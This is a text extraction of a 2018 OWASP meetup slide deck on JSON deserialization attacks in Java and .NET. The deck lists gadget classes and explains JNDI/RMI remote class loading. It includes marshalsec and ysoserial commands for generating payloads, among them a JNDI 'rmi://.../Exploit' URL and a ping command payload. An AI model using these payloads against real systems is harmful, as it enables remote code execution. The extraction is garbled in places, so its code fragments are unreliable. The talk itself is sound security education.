WIXLIB

Json Deserialization ExploitationRCE by Design1 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

contentS1. Introduction2. Basics3. Exploitation4. Summary / Further Research2 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Introduction DefCon 2017: “Friday the 13th: JSON Attacks” [1] Slides quite rightly point out: 2016 was the “year of Java Deserialization apocalypse” In the age of RESTful APIs and microservice architecture, the transmission of objectsshifts to a JSON or XML serialized form Usage of JSON or XML more secure?3 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Introduction Moritz Bechler published a paper about deserialization vulnerabilities (focused onJava JSON and XML) [5] .Net serialization libraries are affected as well [6] OWASP Top 10 2017 RC2 [7] ranked insecure deserialization to the eighth place4 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Introduction5 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

BasicsDummy.json{“id": 1338,“object": "Test"}default T parseJackson(Class T clazz, String json) throws IOException{ObjectMapper mapper new .configure(JsonParser.Feature.ALLOW UNQUOTED FIELD NAMES,true);T object mapper.readValue(json, clazz);return object;}public class Dummy {public int id;public Object object;public int getId() {return id;}6 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Basics JSON marshallers should be able to reconstruct the object using the details present in JSONdata unmarshaller creates a new object (allocates space in memory) using the default (parameterless) constructor reflection to populate all fields or property members JSON libraries need to reconstruct objects by either: Calling default constructor and using reflection to set field values Calling default constructor and calling setters to set field values Calling “special” constructors, type converters or callbacks Calling common methods such as: hashcode(), toString(), equals(), finalize(), 7 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Basics8 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Basics9 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Basics JSON libraries invoked setters to populate object fields [5] and [6] focused their analysis on finding types with setters that could lead to arbitrarycode execution (Java & .Net)10 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

sonGensonJSON-IOFlexSONSnakeYAML (YAML)jYAML (YAML)YamlBeans (YAML)Apache Flex BlazeDS (AMF4)Red5 IO AMF (AMF)Castor (XML)Java XMLDecoder (XML)Java Serialization (binary)Kryo (binary)Hessian/Burlap tream (XML/various)JavaXML/various11 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Basics – GADGETs/Payload Bean property based marshallers gadgets call setter methods which means that far more code can be triggered directly during unmarshalling12 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Basics – util.ServiceLoader onImpljavax.imageio.ImageIO ContainsFilterCommons Configuration JNDIConfigurationC3P0 JndiRefForwardingDataSourceC3P0 WrapperConnectionPoolDataSourceSpring Beans PropertyPathFactoryBeanSpring AOP PartiallyComparableAdvisorHolderSpring AOP AbstractBeanFactoryPointcutAdvisorSpring DefaultListableBeanFactoryApache XBeanCaucho Resinjavax.script.ScriptEngineManagerCommons Beanutils BeanComparatorROME EqualsBean/ToStringBeanGroovy ava.rmi.server.UnicastRemoteObject13 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Exploitation Moritz Bechler published a payload generator based on his previous work https://github.com/mbechler/marshalsec/ Payload Generation via marshaljava -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -a -vjava -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.JsonIO -a -v14 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Exploitation Payload Generation via marko-marshal [8]URI jndiUrl new URI("rmi://localhost:1069/Exploit");Configuration c table("C:\\Windows\\notepad.exe", y).build();MarshalsecFactory factory new MarshalsecFactory(c);List MarshalPayloads allPayloads factory.allPayloads();allPayloads.forEach(payload - :println));15 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

ExploitationJNDI Exploitation – Basics JNDI is the Java Interface to interact with Naming and Directory Services offers a single common interface to interact with disparate Naming and Directoryservices such as Remote Method Invocation (RMI) Lightweight Directory Access Protocol (LDAP), Active Directory, Domain Name System (DNS), Common Object Request Broker Architecture (CORBA), etc.16 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

ExploitationJNDI Exploitation – Basics [9] Java Virtual Machine (JVM) allows loading of custom classes from a remote sourcewithout any restrictions17 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Exploitation RMI Exploitation [9] - Java remote method invocation18 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Exploitation RMI Exploitation [9] - Java remote method invocation19 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

ExploitationRMI Exploitation – Limitation Java 8u121 finally added that codebase restriction, but only for RMI at this point20 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

ExploitationDEMO TIME[10] lities21 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Exploitation All serializers need to reconstruct objects and will normally invoke methods Problem is not limited to Java (e.g. BinaryFormatter in .Net)ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c"ping 10.0.0.19" execute-ping.txtQuelle: emote-code-execution22 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Summary / FuRther Work JSON is not safe Security by design: identify the use of known vulnerable components https://www.cvedetails.com/cve/CVE-2017-9805/ Other libraries? (Vert.x) Burp Plugin (Burp Collaborator)23 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Summary / FuRther Work ? One year later [11]: Published date: 07 June 2018 https://github.com/nccgroup/freddy24 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Summary / FuRther Work JSON is not safe Other libraries? (Vert.x) Pentest view? BOSCH & AXA Burp Plugin (Burp Colllaborator)25 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Summary / FuRther Work Notable exceptions without this kind of behavior: JAXB implementations generally require that all types used are registered. Mechanisms thatrequire schema definitions or compilation (e.g. XmlBeans, Jibx, Protobuf). GSON requires specifying a root type, honors property types and the mechanism forpolymorphism requires registration. GWT-RPC generally does use supplied type information, but automatically builds a whitelist.26 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

FIN27 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

References [1] tacks.pdf [2] ns/file ava-endpoints.pdf [3] https://github.com/frohoff/ysoserial [4] ckles/ [5] /marshalsec.pdf [6] -Munoz-Friday-The-13th-JSON-Attacks-wp.pdf /OWASP%20Top%2010%202017%20RC2%20Final.pdf [8] https://github.com/no-sec-marko/marshalsec [9] 8F%8A%E5%88%A9%E7%94%A8/ [10] lities [11] n-killer/28 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

3 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Introduction DefCon 2017: "Friday the 13th: JSON Attacks" [1] Slides quite rightly point out: 2016 was the "year of Java Deserialization apocalypse" In the age of RESTful APIs and microservice architecture, the transmission of objects shifts to a JSON or XML serialized form